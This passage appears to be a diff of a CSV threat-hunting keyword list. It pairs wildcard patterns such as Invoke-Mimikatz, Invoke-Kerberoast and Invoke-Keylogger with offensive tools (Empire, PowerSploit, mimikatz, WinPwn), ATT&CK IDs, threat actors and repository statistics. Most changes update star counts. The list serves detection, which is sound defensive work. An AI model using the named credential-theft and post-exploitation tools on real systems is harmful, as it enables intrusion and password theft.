Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Kerberoast*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-Kerberoast.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-Keylogger.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework 
created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-KrbRelay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-KrbRelay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-LapsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-LapsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-LdapSignCheck*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped 
into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-LdapSignCheck*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-LapsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-LdapSignCheck*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-LdapSignCheck*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - 
TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Lockless*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Locksmith.ps1*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","472","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" -"*Invoke-LoginPrompt.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Invoke-LsaProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Lockless*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Locksmith.ps1*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*Invoke-LoginPrompt.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. 
vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Invoke-LsaProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-LsaProtectionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-MachineRoleCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-MalSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-MalSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-MapDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-MachineRoleCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-MalSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-MalSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-MapDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Merlin.ps1*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*Invoke-MetaTwin*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*InvokeMeter.bat*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*Invoke-MFASweep*","offensive_tool_keyword","FMFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1033","152","2023-07-25T05:10:55Z","2020-09-22T16:25:03Z" -"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - 
T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","23","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" -"*Invoke-Mimikatz*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-Mimikatz*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Mimikatz.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Mimikatz.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" -"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","23","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" +"*Invoke-Mimikatz.ps1*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","10","1","24","6","2023-03-02T22:59:52Z","2020-09-22T16:47:19Z" "*Invoke-Mimikatz-old*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*Invoke-MITM6*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" 
-"*Invoke-ModifiableProgramsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-MonitorCredSniper*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2625","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" -"*Invoke-MS16*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16032.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-MS16032*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
